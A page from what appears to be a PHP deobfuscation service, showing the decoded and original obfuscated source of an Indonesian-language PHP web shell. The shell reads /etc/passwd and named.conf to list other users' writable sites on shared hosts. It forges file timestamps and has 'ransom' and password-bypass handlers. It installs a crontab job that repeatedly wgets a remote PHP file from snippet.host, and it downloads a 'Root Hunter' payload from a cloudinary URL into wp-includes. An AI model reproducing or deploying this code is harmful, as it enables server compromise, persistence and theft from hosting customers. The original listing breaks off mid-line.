Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto GpOwm; BxahF: if ($_GET["\x61\153\x73\151"] == "\x73\x79\x6d\x72\145\141\144") { III..
Decoded Output download
<? goto GpOwm; BxahF: if ($_GET["aksi"] == "symread") { IIIIIII11lI1($dir, $file); } goto qk_sa; Y0Kw9: if ($_GET["aksi"] == "ransom") { ransom($dir, $file); } goto PS3VR; lzT0f: if ($_GET["aksi"] == "buat_file") { IIIIIIIlllll($dir, $IIIIIIII1l1l); } goto IRMhO; jGTWq: function IIIIIIII1l11($IIIIIIII11II) { $IIIIIIII11Il = array("B", "KB", "MB", "GB", "TB"); for ($IIIIIIII11I1 = 0; $IIIIIIII11II >= 1024 && $IIIIIIII11I1 < count($IIIIIIII11Il) - 1; $IIIIIIII11II /= 1024, $IIIIIIII11I1++) { } return round($IIIIIIII11II, 2) . " " . $IIIIIIII11Il[$IIIIIIII11I1]; } goto tgxbG; mi15o: function IIIIIII1IIlI($dir, $file, $IIIIIIII1III) { $IIIIIIII11I1 = 0; echo "<div class='card container'>"; if (preg_match("/hsphere/", $dir)) { $IIIIIII1IIl1 = explode("\xa", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($IIIIIII1IIl1 as $url) { $url = str_replace(array("http://", "www."), '', strtolower($url)); $IIIIIII1II11 = "/etc/passwd"; $IIIIIII1IlII = fopen($IIIIIII1II11, "r"); while ($IIIIIII1IlIl = fgets($IIIIIII1IlII)) { $IIIIIII1IlI1 = explode(":", $IIIIIII1IlIl); $user = $IIIIIII1IlI1[0]; $IIIIIII1Illl = "/hsphere/local/home/{$user}"; if (is_dir($IIIIIII1Illl) === true) { $IIIIIII1Ill1 = $IIIIIII1Illl . "/" . $url; if (is_readable($IIIIIII1Ill1)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "[<font color=green>R</font>] <a href='?dir={$IIIIIII1Ill1}'><font color=#0046FF>{$IIIIIII1Ill1}</font></a>"; if (is_writable($IIIIIII1Ill1)) { $IIIIIII1Il1I = "[<font color=green>RW</font>] <a href='?dir={$IIIIIII1Ill1}'><font color=#0046FF>{$IIIIIII1Ill1}</font></a>"; } echo $IIIIIII1Il1I . "<br>"; } } } } if (!$IIIIIIII11I1 == 0) { echo "<br>Total ada {$IIIIIIII11I1} KAMAR di {$IIIIIIII1III}"; } echo "</pre>"; } else { echo "<center><form method="post">
List Domains: <br>
<textarea name="url" class="form-control">"; $IIIIIII1Il1l = fopen("/hsphere/local/config/httpd/sites/sites.txt", "r"); while ($IIIIIII1Il11 = fgets($IIIIIII1Il1l)) { echo $IIIIIII1Il11; } echo "</textarea><br>
<input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
</form></center>"; } } elseif (preg_match("/vhosts/", $dir)) { $IIIIIII1IIl1 = explode("
", $_POST["url"]); if (isset($_POST["jump"])) { echo "<pre>"; foreach ($IIIIIII1IIl1 as $url) { $IIIIIII1I1II = "/var/www/vhosts/{$url}/httpdocs"; if (is_dir($IIIIIII1I1II) === true) { if (is_readable($IIIIIII1I1II)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "[<font color=green>R</font>] <a href='?dir={$IIIIIII1I1II}'><font color=#0046FF>{$IIIIIII1I1II}</font></a>"; if (is_writable($IIIIIII1I1II)) { $IIIIIII1Il1I = "[<font color=green>RW</font>] <a href='?dir={$IIIIIII1I1II}'><font color=#0046FF>{$IIIIIII1I1II}</font></a>"; } echo $IIIIIII1Il1I . "<br>"; } } } if (!$IIIIIIII11I1 == 0) { echo "<br>Total ada {$IIIIIIII11I1} Kamar Di {$IIIIIIII1III}"; } echo "</pre>"; } else { echo "<center><form method="post">
List Domains: <br>
<textarea name="url" class="form-control">"; bing("ip:{$IIIIIIII1III}"); echo "</textarea><br>\xa<input type="submit" value="Jumping" name="jump" class="btn btn-danger btn-block">
</form></center>"; } } else { echo "<pre>"; $IIIIIII1II11 = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><br/>"); while ($passwd = fgets($IIIIIII1II11)) { if ($passwd == '' || !$IIIIIII1II11) { echo "<font color=red>Can't read /etc/passwd</font><br/>"; } else { preg_match_all("/(.*?):x:/", $passwd, $IIIIIII1I1I1); foreach ($IIIIIII1I1I1[1] as $IIIIIII1I1lI) { $IIIIIII1I1ll = "/home/{$IIIIIII1I1lI}/public_html"; if (is_readable($IIIIIII1I1ll)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "[<font color=green>R</font>] <a href='?dir={$IIIIIII1I1ll}'><font color=#0046FF>{$IIIIIII1I1ll}</font></a>"; if (is_writable($IIIIIII1I1ll)) { $IIIIIII1Il1I = "[<font color=green>RW</font>] <a href='?dir={$IIIIIII1I1ll}'><font color=#0046FF>{$IIIIIII1I1ll}</font></a>"; } echo $IIIIIII1Il1I; if (function_exists("posix_getpwuid")) { $IIIIIII1I1l1 = file_get_contents("/etc/named.conf"); if ($IIIIIII1I1l1 == '') { echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>"; } else { preg_match_all("#/var/named/(.*?).db#", $IIIIIII1I1l1, $IIIIIII1I11I); foreach ($IIIIIII1I11I[1] as $IIIIIII1I11l) { $IIIIIII1I111 = posix_getpwuid(@fileowner("/etc/valiases/{$IIIIIII1I11l}")); $IIIIIII1I111 = $IIIIIII1I111["name"]; if ($IIIIIII1I111 == $IIIIIII1I1lI) { echo " => ( <u>{$IIIIIII1I11l}</u> )<br>"; break; } } } } else { echo "<br>"; } } } } } if (!$IIIIIIII11I1 == 0) { echo "<br>Total ada {$IIIIIIII11I1} kamar di {$IIIIIIII1III}"; } echo "</pre>"; } echo "</div><br/>"; die; } goto DGXlf; QR2gb: if ($_GET["aksi"] == "passwbypass") { IIIIIII1lll1($dir, $file); } goto kV2xI; GVG6U: if (isset($_GET["changedatenya"])) { $IIIIIIlllI11 = $_GET["changedatenya"]; echo "<pre class='text-white'>" . ex("ls '{$IIIIIIlllI11}' > date.txt") . "</pre>"; ex("for i in $(cat date.txt);do touch -mt $(echo 201$(shuf -i0-12 -n1)0$(shuf -i0-12 -n1)0$(shuf -i0-12 -n1)0000) " . $_GET["changedatenya"] . "/$i;done"); echo "<p class='text-white'>[+] Done!<br>[*] Not Working? <a href='?dir=" . $dir . "&aksi=ngebepass'>Bypass it</a></p></div></div>"; ex("rm -rf date.txt"); die; } goto T4EHp; t_iiR: $IIIIIIII1llI = @ini_get("disable_functions"); goto vKC7m; XzELM: echo " [ " . w($dir, IIIIIIIIl1II($dir)) . " ]</span>"; goto usbii; OPGhy: function IIIIIIIlI1Il($dir) { echo "<div class="card mb-5">
<div class="card-body form-group">
<p class="text-muted">Crontab Shell</p>\xa"; ex("pwd=$(pwd);echo "* * * * * wget -O $pwd/auto_admin.php https://snippet.host/pwxy/raw" | crontab"); $IIIIIIIlI1I1 = ex("crontab -l"); if ($IIIIIIIlI1I1 == '') { echo "<p class="font-weight-bold text-danger">[-] Failed Memasang</p></div></div>"; } else { echo "<p class="font-weight-bold text-success">[+] Running Crontab : </br>" . ex("crontab -l") . "</p></div></div>"; } } goto HgISA; LFiqG: if (isset($_GET["findwrite"])) { $IIIIIIlllI11 = $_GET["findwrite"]; echo "<pre class='text-white'>" . ex("ls '{$IIIIIIlllI11}' > date.txt") . "</pre>"; ex("find " . $_GET["findwrite"] . " -type d -writable > writable.txt"); echo "<p class='text-white'>[+] Found : </p><br><p class='text-white'>" . ex("for i in $(cat writable.txt);do printf "$i => Found\xa";done") . "</p></div></div>"; die; } goto AjK8T; DjebA: if ($_GET["aksi"] == "symlink") { IIIIIII1l1l1($dir, $file); } goto UBaO0; IGcBk: function deployrh($dir) { echo "<div class="card mb-5">\xa<div class="card-body form-group">"; echo "<p class="text-warning text-center font-weight-bold">[+] Deploying Root Hunter v1</p>"; echo "<form method="post">"; echo "<center><input class="btn btn-success" type="submit" name="deployrhws" value="Deploy Root Hunter"></center>"; echo "</form>"; if (isset($_POST["deployrhws"])) { $deployrh_result = ''; $startDirectory = realpath(__DIR__); if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $url = "https://"; } else { $url = "http://"; } $url .= $_SERVER["HTTP_HOST"]; if ($startDirectory !== $_SERVER["DOCUMENT_ROOT"]) { $rhws_path = $startDirectory . "/wp-includes/pomo/"; $rhws = $startDirectory . "/wp-includes/pomo/singular-forms.php"; $doc = $startDirectory . "/footer_OLD.php"; $cleaned = str_replace($startDirectory, '', $rhws_path); $cleaned_doc = str_replace($startDirectory, '', $doc); } else { $rhws_path = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/pomo/"; $rhws = $_SERVER["DOCUMENT_ROOT"] . "/wp-includes/pomo/singular-forms.php"; $doc = $_SERVER["DOCUMENT_ROOT"] . "/footer_OLD.php"; $cleaned = str_replace($_SERVER["DOCUMENT_ROOT"], '', $rhws_path); $cleaned_doc = str_replace($_SERVER["DOCUMENT_ROOT"], '', $doc); } $src = "https://res.cloudinary.com/dbassets/raw/upload/v1652038152/tool/class-category_gugz7q.txt"; if (file_exists($rhws)) { $deployrh_result .= "<span class="text-center text-info font-weight-bold;">[+] Root Hunter v1 Sudah Ada!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned . "</a></span><br/>"; } if (file_exists($doc)) { $deployrh_result .= "<span class="text-center text-info font-weight-bold;">[+] Root Hunter v1 Sudah Ada!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned_doc . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned_doc . "</a></span><br/>"; } if (is_dir($rhws_path) && is_writable($rhws_path)) { $content = file_get_contents($src); $status = file_put_contents($rhws, $content); if ($status) { $deployrh_result .= "<span class="text-center text-success font-weight-bold;">[+] Berhasil Deploy Root Hunter v1!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned . "</a></span><br/><br/>"; chmod($rhws, 292); } else { $deployrh_result .= "<span class="text-center text-danger font-weight-bold;">[-] Gagal Deploy Root Hunter v1!</span><br/>"; } } else { $content = file_get_contents($src); $status = file_put_contents($doc, $content); if ($status) { $deployrh_result .= "<span class="text-center text-success font-weight-bold;">[+] Berhasil Deploy Root Hunter v1!</span><br/>"; $deployrh_result .= "<span class="text-center text-info font-weight-bold;"><a href="" . $url . $cleaned_doc . "" target="_blank" rel="nofollow noopener noreferrer" class="text-center text-info">" . $url . $cleaned_doc . "</a></span><br/><br/>"; chmod($doc, 292); } else { $deployrh_result .= "<span class="text-center text-danger font-weight-bold;">[-] Gagal Deploy Root Hunter v1!</span><br/>"; } } echo "<div style="border-bottom:0;margin-top:5px;" readonly>"; echo "<center>"; print_r($deployrh_result) . PHP_EOL; echo "</center>"; echo "</div>"; } echo "</div></div>"; } goto eLB0i; bYCUl: if ($_GET["aksi"] == "rename") { IIIIIIIll11I($dir, $file, $IIIIIIIlllIl, $IIIIIIII1l1l); } goto JNqQW; Ou_xB: function IIIIIIIlllll($dir, $IIIIIIII1l1l) { echo "<h4>{$IIIIIIII1l1l} Buat File :</h4>\xa<form method='POST'>\xa<div class='input-group'>\xa<input type='text' class='form-control' name='nama_file[]' placeholder='Nama File...'>
<div class='input-group-prepend'>
<div class='input-group-text'><a id='add_input'><i class='fa fa-plus'></i></a></div>\xa</div>\xa</div><br/>\xa<div id='output'></div>
<textarea name='isi_file' class='form-control' rows='15' placeholder='Isi File...'></textarea><br/>
<input type='submit' class='btn btn-success btn-block mb-5' name='bikin' value='Buat'>
</form>"; if (isset($_POST["bikin"])) { $name = $_POST["nama_file"]; $isi_file = $_POST["isi_file"]; foreach ($name as $nama_file) { $IIIIIIIIlI1l = @fopen("{$nama_file}", "w"); if ($isi_file) { $buat = @fwrite($IIIIIIIIlI1l, $isi_file); } else { $buat = $IIIIIIIIlI1l; } } if ($buat) { $IIIIIIIlIl1l = "success"; $IIIIIIIlIl11 = "Berhasil Membuat File"; IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir); } else { $IIIIIIIlIl1l = "error"; $IIIIIIIlIl11 = "Gagal Membuat File"; IIIIIIIlIl1I($IIIIIIIlIl1l, $IIIIIIIlIl11, $dir); } } } goto aV7hf; VduaH: if ($_GET["aksi"] == "modules") { modules($dir); } goto AFmQi; omEN2: ?>
Did this file decode correctly?
Original Code
goto GpOwm; BxahF: if ($_GET["\x61\153\x73\151"] == "\x73\x79\x6d\x72\145\141\144") { IIIIIII11lI1($dir, $file); } goto qk_sa; Y0Kw9: if ($_GET["\x61\x6b\163\151"] == "\x72\x61\x6e\x73\x6f\155") { ransom($dir, $file); } goto PS3VR; lzT0f: if ($_GET["\x61\x6b\x73\x69"] == "\142\x75\x61\164\137\146\x69\x6c\x65") { IIIIIIIlllll($dir, $IIIIIIII1l1l); } goto IRMhO; jGTWq: function IIIIIIII1l11($IIIIIIII11II) { $IIIIIIII11Il = array("\x42", "\x4b\x42", "\115\x42", "\107\102", "\x54\102"); for ($IIIIIIII11I1 = 0; $IIIIIIII11II >= 1024 && $IIIIIIII11I1 < count($IIIIIIII11Il) - 1; $IIIIIIII11II /= 1024, $IIIIIIII11I1++) { } return round($IIIIIIII11II, 2) . "\x20" . $IIIIIIII11Il[$IIIIIIII11I1]; } goto tgxbG; mi15o: function IIIIIII1IIlI($dir, $file, $IIIIIIII1III) { $IIIIIIII11I1 = 0; echo "\x3c\x64\151\x76\40\143\154\141\x73\x73\75\x27\x63\x61\x72\144\x20\143\157\156\x74\x61\x69\x6e\145\x72\x27\76"; if (preg_match("\57\x68\163\x70\150\x65\162\145\57", $dir)) { $IIIIIII1IIl1 = explode("\xa", $_POST["\165\x72\154"]); if (isset($_POST["\x6a\165\155\160"])) { echo "\x3c\160\162\145\76"; foreach ($IIIIIII1IIl1 as $url) { $url = str_replace(array("\150\164\x74\x70\x3a\57\x2f", "\x77\167\167\56"), '', strtolower($url)); $IIIIIII1II11 = "\x2f\x65\164\143\57\x70\141\x73\163\x77\x64"; $IIIIIII1IlII = fopen($IIIIIII1II11, "\162"); while ($IIIIIII1IlIl = fgets($IIIIIII1IlII)) { $IIIIIII1IlI1 = explode("\x3a", $IIIIIII1IlIl); $user = $IIIIIII1IlI1[0]; $IIIIIII1Illl = "\57\x68\163\x70\150\x65\x72\145\57\154\x6f\143\x61\154\x2f\150\157\155\x65\x2f{$user}"; if (is_dir($IIIIIII1Illl) === true) { $IIIIIII1Ill1 = $IIIIIII1Illl . "\x2f" . $url; if (is_readable($IIIIIII1Ill1)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "\x5b\74\x66\157\x6e\x74\x20\x63\157\154\157\162\x3d\147\162\145\x65\x6e\x3e\x52\x3c\x2f\x66\x6f\156\164\76\135\40\74\x61\40\150\162\145\x66\x3d\x27\77\x64\x69\162\x3d{$IIIIIII1Ill1}\x27\76\x3c\146\x6f\x6e\x74\40\143\x6f\x6c\x6f\162\75\x23\60\x30\64\x36\106\x46\x3e{$IIIIIII1Ill1}\74\57\146\157\156\164\76\x3c\57\x61\x3e"; if (is_writable($IIIIIII1Ill1)) { $IIIIIII1Il1I = "\133\74\x66\x6f\156\x74\x20\x63\x6f\x6c\x6f\x72\75\147\x72\x65\x65\x6e\x3e\122\x57\74\57\146\157\x6e\x74\x3e\135\40\x3c\x61\x20\x68\162\145\146\75\47\77\x64\151\x72\x3d{$IIIIIII1Ill1}\47\x3e\74\146\x6f\156\x74\x20\x63\157\154\x6f\162\75\43\x30\60\64\x36\106\x46\76{$IIIIIII1Ill1}\x3c\57\146\157\x6e\x74\x3e\74\57\141\76"; } echo $IIIIIII1Il1I . "\74\x62\162\76"; } } } } if (!$IIIIIIII11I1 == 0) { echo "\74\x62\162\x3e\124\x6f\x74\141\x6c\x20\141\x64\x61\40{$IIIIIIII11I1}\x20\113\x41\x4d\101\x52\40\144\151\x20{$IIIIIIII1III}"; } echo "\x3c\x2f\x70\162\x65\x3e"; } else { echo "\x3c\143\x65\x6e\x74\145\162\x3e\74\x66\x6f\162\x6d\x20\x6d\x65\164\x68\x6f\x64\x3d\42\160\157\163\164\x22\x3e\12\114\151\163\164\40\x44\157\x6d\141\x69\156\163\x3a\x20\x3c\142\x72\76\12\74\164\x65\x78\x74\141\162\145\x61\40\156\141\155\x65\75\42\165\162\154\x22\x20\x63\154\x61\x73\x73\x3d\42\x66\x6f\162\x6d\x2d\143\157\156\164\x72\x6f\x6c\42\76"; $IIIIIII1Il1l = fopen("\x2f\x68\163\160\150\x65\x72\x65\x2f\154\157\x63\141\154\x2f\x63\x6f\156\x66\151\x67\x2f\x68\164\164\x70\x64\57\x73\151\x74\x65\x73\57\163\151\x74\145\163\56\164\170\x74", "\162"); while ($IIIIIII1Il11 = fgets($IIIIIII1Il1l)) { echo $IIIIIII1Il11; } echo "\74\57\x74\x65\170\164\141\162\x65\x61\x3e\x3c\142\162\76\12\x3c\151\x6e\160\165\x74\40\164\171\x70\145\x3d\42\x73\x75\142\155\x69\x74\x22\40\x76\141\154\x75\x65\x3d\42\112\x75\x6d\160\151\156\147\x22\x20\x6e\x61\155\145\75\42\x6a\165\155\160\x22\x20\143\154\x61\x73\163\75\42\x62\164\x6e\x20\x62\x74\156\55\144\141\156\x67\x65\162\40\x62\164\x6e\x2d\x62\154\x6f\143\x6b\42\76\12\74\57\146\157\162\155\76\x3c\57\x63\x65\x6e\x74\x65\x72\x3e"; } } elseif (preg_match("\x2f\166\150\157\163\164\163\57", $dir)) { $IIIIIII1IIl1 = explode("\12", $_POST["\165\x72\x6c"]); if (isset($_POST["\x6a\x75\155\x70"])) { echo "\74\160\162\145\76"; foreach ($IIIIIII1IIl1 as $url) { $IIIIIII1I1II = "\x2f\x76\141\x72\57\x77\167\x77\x2f\166\x68\x6f\163\x74\163\x2f{$url}\x2f\x68\x74\x74\x70\x64\157\x63\163"; if (is_dir($IIIIIII1I1II) === true) { if (is_readable($IIIIIII1I1II)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "\x5b\74\x66\x6f\156\x74\x20\143\x6f\x6c\157\162\x3d\147\162\x65\145\156\x3e\x52\74\x2f\x66\157\156\164\x3e\135\40\x3c\141\x20\150\x72\x65\146\x3d\x27\77\144\151\162\75{$IIIIIII1I1II}\47\76\x3c\146\157\x6e\164\x20\143\157\154\157\x72\x3d\43\x30\60\x34\66\x46\106\76{$IIIIIII1I1II}\74\57\x66\157\x6e\164\76\x3c\x2f\141\x3e"; if (is_writable($IIIIIII1I1II)) { $IIIIIII1Il1I = "\133\x3c\x66\157\156\x74\x20\143\157\154\157\x72\x3d\x67\x72\x65\145\x6e\x3e\122\127\x3c\57\146\x6f\156\x74\76\135\x20\x3c\141\40\x68\162\x65\x66\75\47\x3f\x64\x69\x72\x3d{$IIIIIII1I1II}\x27\x3e\x3c\x66\x6f\156\164\40\143\x6f\154\157\162\x3d\43\60\x30\64\x36\x46\x46\76{$IIIIIII1I1II}\x3c\57\146\x6f\156\x74\76\74\x2f\141\76"; } echo $IIIIIII1Il1I . "\x3c\142\x72\x3e"; } } } if (!$IIIIIIII11I1 == 0) { echo "\74\x62\x72\76\x54\x6f\164\141\x6c\x20\141\x64\141\40{$IIIIIIII11I1}\x20\x4b\x61\x6d\x61\x72\40\104\151\40{$IIIIIIII1III}"; } echo "\74\x2f\x70\x72\x65\x3e"; } else { echo "\74\143\x65\156\x74\x65\162\x3e\x3c\x66\x6f\x72\x6d\x20\155\x65\164\150\157\144\x3d\42\160\x6f\x73\164\42\76\12\114\151\x73\x74\40\104\x6f\x6d\141\151\156\x73\72\x20\74\x62\162\x3e\12\x3c\x74\x65\170\164\141\x72\x65\141\40\156\141\x6d\x65\75\42\x75\162\x6c\42\40\x63\154\x61\163\x73\x3d\x22\146\x6f\x72\155\x2d\x63\157\156\x74\162\157\x6c\x22\76"; bing("\x69\160\72{$IIIIIIII1III}"); echo "\x3c\x2f\x74\145\170\x74\141\162\145\141\76\74\x62\x72\76\xa\x3c\x69\156\160\x75\x74\40\164\171\160\x65\x3d\42\x73\165\x62\155\151\164\x22\x20\x76\x61\x6c\x75\145\75\x22\112\x75\x6d\160\x69\156\147\x22\40\x6e\x61\x6d\x65\75\x22\152\165\155\160\x22\x20\x63\x6c\x61\163\163\75\x22\x62\164\x6e\40\142\x74\156\x2d\144\x61\x6e\x67\145\x72\40\142\x74\x6e\x2d\142\154\x6f\x63\153\x22\x3e\12\x3c\x2f\146\157\162\x6d\76\x3c\57\x63\145\156\164\145\162\76"; } } else { echo "\74\160\162\x65\76"; $IIIIIII1II11 = fopen("\57\x65\164\143\57\160\x61\163\163\x77\144", "\x72") or die("\74\x66\157\156\164\x20\143\x6f\154\157\x72\75\162\145\144\76\x43\x61\x6e\47\x74\40\162\145\x61\x64\x20\x2f\145\x74\x63\57\x70\141\x73\163\167\144\x3c\57\146\x6f\x6e\164\76\x3c\x62\x72\x2f\x3e"); while ($passwd = fgets($IIIIIII1II11)) { if ($passwd == '' || !$IIIIIII1II11) { echo "\74\x66\157\x6e\164\40\143\157\x6c\x6f\x72\75\162\145\x64\x3e\x43\x61\156\47\164\x20\x72\145\x61\144\x20\x2f\x65\164\x63\x2f\x70\x61\163\163\x77\x64\x3c\57\146\157\x6e\x74\76\x3c\x62\162\57\76"; } else { preg_match_all("\x2f\50\x2e\52\x3f\51\72\170\72\x2f", $passwd, $IIIIIII1I1I1); foreach ($IIIIIII1I1I1[1] as $IIIIIII1I1lI) { $IIIIIII1I1ll = "\x2f\x68\x6f\x6d\x65\57{$IIIIIII1I1lI}\x2f\160\165\x62\x6c\151\x63\137\x68\x74\x6d\154"; if (is_readable($IIIIIII1I1ll)) { $IIIIIIII11I1++; $IIIIIII1Il1I = "\133\x3c\x66\157\156\x74\x20\143\157\154\157\162\x3d\x67\x72\x65\x65\156\76\x52\x3c\x2f\146\157\156\x74\76\135\40\x3c\141\x20\150\x72\x65\x66\75\x27\77\x64\x69\x72\x3d{$IIIIIII1I1ll}\47\76\74\146\x6f\156\164\x20\143\157\154\x6f\162\75\x23\60\60\64\x36\106\x46\x3e{$IIIIIII1I1ll}\74\57\146\157\156\x74\x3e\x3c\57\x61\x3e"; if (is_writable($IIIIIII1I1ll)) { $IIIIIII1Il1I = "\133\74\146\157\x6e\x74\40\x63\x6f\x6c\x6f\x72\75\x67\x72\145\x65\156\x3e\x52\x57\74\57\x66\157\156\x74\x3e\x5d\40\x3c\141\x20\150\162\x65\x66\x3d\47\x3f\144\151\x72\75{$IIIIIII1I1ll}\x27\76\74\146\x6f\x6e\164\x20\143\x6f\154\157\162\x3d\x23\60\60\x34\x36\106\106\x3e{$IIIIIII1I1ll}\74\57\146\x6f\156\164\76\x3c\x2f\x61\x3e"; } echo $IIIIIII1Il1I; if (function_exists("\x70\157\163\151\x78\x5f\x67\145\164\160\x77\x75\x69\144")) { $IIIIIII1I1l1 = file_get_contents("\57\x65\x74\x63\x2f\156\141\155\x65\x64\56\143\157\156\146"); if ($IIIIIII1I1l1 == '') { echo "\40\x3d\76\40\50\40\74\x66\x6f\x6e\x74\x20\x63\x6f\154\157\x72\75\162\145\144\x3e\147\x61\142\151\163\x61\40\x61\155\142\x69\x6c\40\x6e\141\155\141\x20\x64\157\155\x61\x69\x6e\x20\x6e\x79\141\x3c\x2f\146\157\156\164\76\40\x29\74\142\162\x3e"; } else { preg_match_all("\43\57\166\141\x72\x2f\156\141\155\x65\144\x2f\x28\56\52\77\51\x2e\x64\x62\43", $IIIIIII1I1l1, $IIIIIII1I11I); foreach ($IIIIIII1I11I[1] as $IIIIIII1I11l) { $IIIIIII1I111 = posix_getpwuid(@fileowner("\x2f\145\x74\x63\57\x76\x61\154\x69\x61\163\145\163\x2f{$IIIIIII1I11l}")); $IIIIIII1I111 = $IIIIIII1I111["\156\141\155\145"]; if ($IIIIIII1I111 == $IIIIIII1I1lI) { echo "\x20\x3d\x3e\40\50\40\x3c\165\76{$IIIIIII1I11l}\74\x2f\165\76\x20\51\74\142\162\x3e"; break; } } } } else { echo "\x3c\x62\162\x3e"; } } } } } if (!$IIIIIIII11I1 == 0) { echo "\x3c\142\162\76\x54\x6f\164\x61\x6c\40\x61\144\x61\x20{$IIIIIIII11I1}\40\153\x61\x6d\x61\x72\40\144\151\40{$IIIIIIII1III}"; } echo "\x3c\x2f\x70\162\145\x3e"; } echo "\x3c\x2f\x64\x69\x76\76\x3c\142\x72\57\76"; die; } goto DGXlf; QR2gb: if ($_GET["\141\153\x73\151"] == "\160\141\163\x73\x77\x62\171\160\141\163\x73") { IIIIIII1lll1($dir, $file); } goto kV2xI; GVG6U: if (isset($_GET["\143\x68\x61\156\147\145\x64\x61\x74\145\156\x79\x61"])) { $IIIIIIlllI11 = $_GET["\143\x68\x61\156\147\145\144\x61\164\x65\x6e\x79\x61"]; echo "\x3c\x70\162\145\x20\143\x6c\x61\163\x73\x3d\x27\164\x65\170\x74\55\167\150\151\164\145\x27\76" . ex("\154\163\x20\x27{$IIIIIIlllI11}\x27\40\76\x20\144\x61\164\x65\x2e\x74\x78\164") . "\74\x2f\x70\162\145\x3e"; ex("\146\x6f\x72\x20\x69\40\151\x6e\40\44\x28\143\141\x74\x20\x64\141\164\x65\56\164\170\x74\x29\73\144\x6f\x20\164\x6f\165\143\150\x20\x2d\155\164\x20\44\50\x65\143\x68\x6f\x20\62\x30\x31\44\x28\x73\x68\165\146\x20\x2d\151\60\55\x31\62\x20\x2d\x6e\61\x29\60\x24\x28\163\x68\x75\x66\x20\55\x69\x30\55\61\x32\x20\55\x6e\61\51\x30\44\x28\x73\x68\x75\x66\x20\x2d\x69\x30\x2d\61\x32\x20\55\x6e\x31\x29\x30\x30\60\60\x29\x20" . $_GET["\x63\x68\141\156\147\145\144\x61\x74\x65\156\171\141"] . "\x2f\x24\151\73\x64\157\x6e\x65"); echo "\74\x70\40\x63\x6c\x61\x73\x73\75\47\x74\x65\170\164\55\167\150\x69\x74\x65\x27\x3e\133\53\135\40\x44\x6f\156\145\x21\74\x62\162\x3e\x5b\52\135\x20\x4e\157\164\x20\x57\x6f\162\153\x69\x6e\147\77\40\74\x61\40\150\162\x65\x66\x3d\x27\77\144\151\162\x3d" . $dir . "\46\141\x6b\x73\151\75\x6e\147\145\142\145\x70\141\x73\x73\x27\76\102\x79\x70\141\x73\163\40\x69\x74\74\x2f\141\76\x3c\57\x70\76\x3c\57\144\x69\166\x3e\74\x2f\144\151\x76\76"; ex("\162\x6d\x20\55\162\146\x20\x64\141\164\x65\56\x74\170\164"); die; } goto T4EHp; t_iiR: $IIIIIIII1llI = @ini_get("\x64\151\163\x61\x62\154\x65\137\x66\x75\x6e\x63\x74\151\x6f\x6e\163"); goto vKC7m; XzELM: echo "\x26\x6e\142\163\x70\73\x26\x6e\x62\x73\160\x3b\x5b\x20" . w($dir, IIIIIIIIl1II($dir)) . "\40\135\74\x2f\x73\x70\141\x6e\x3e"; goto usbii; OPGhy: function IIIIIIIlI1Il($dir) { echo "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\163\75\x22\x63\141\x72\144\40\155\142\55\x35\x22\76\12\x3c\144\x69\166\40\143\x6c\x61\x73\163\x3d\x22\x63\141\x72\144\55\142\x6f\x64\x79\40\x66\157\x72\155\55\x67\162\157\x75\x70\42\76\12\74\x70\40\143\154\x61\163\x73\x3d\x22\164\145\170\164\55\155\165\164\145\x64\42\76\x43\x72\157\156\164\x61\142\40\123\x68\145\154\x6c\74\x2f\160\76\xa"; ex("\160\x77\x64\x3d\44\50\160\167\144\x29\73\x65\143\150\157\40\x22\x2a\40\x2a\x20\x2a\40\x2a\x20\52\40\x77\147\145\x74\40\x2d\x4f\40\44\160\167\144\57\x61\165\164\x6f\x5f\x61\144\155\151\x6e\x2e\x70\150\160\x20\x68\x74\x74\x70\x73\72\57\x2f\x73\x6e\x69\160\160\x65\164\56\150\157\x73\x74\57\x70\x77\x78\171\57\162\x61\x77\42\x20\x7c\x20\143\162\157\x6e\164\141\142"); $IIIIIIIlI1I1 = ex("\x63\x72\x6f\x6e\x74\141\142\x20\55\154"); if ($IIIIIIIlI1I1 == '') { echo "\x3c\160\40\x63\154\x61\x73\163\75\42\146\157\156\x74\x2d\x77\x65\151\147\x68\x74\55\142\x6f\154\x64\x20\164\x65\170\x74\55\x64\141\x6e\x67\145\162\42\76\133\55\x5d\x20\106\x61\x69\154\145\144\x20\x4d\145\155\141\163\141\156\147\74\x2f\x70\76\74\57\x64\x69\x76\76\74\57\144\x69\166\x3e"; } else { echo "\74\160\x20\143\x6c\141\x73\x73\75\x22\x66\x6f\156\164\55\167\145\151\x67\150\x74\x2d\x62\x6f\154\144\x20\164\x65\170\x74\55\163\x75\143\x63\145\163\163\42\76\133\x2b\x5d\x20\x52\165\x6e\x6e\x69\156\x67\40\103\x72\x6f\156\164\x61\x62\x20\72\x20\x3c\x2f\142\x72\76" . ex("\143\x72\x6f\x6e\164\x61\x62\x20\55\154") . "\74\x2f\x70\x3e\74\x2f\x64\x69\166\x3e\74\x2f\144\151\x76\x3e"; } } goto HgISA; LFiqG: if (isset($_GET["\146\151\156\x64\x77\162\151\164\145"])) { $IIIIIIlllI11 = $_GET["\146\x69\x6e\x64\167\162\151\x74\145"]; echo "\74\160\x72\145\x20\143\x6c\x61\x73\x73\75\47\164\x65\170\x74\55\x77\x68\151\x74\145\47\x3e" . ex("\154\163\40\x27{$IIIIIIlllI11}\47\40\76\40\144\x61\x74\145\56\x74\x78\x74") 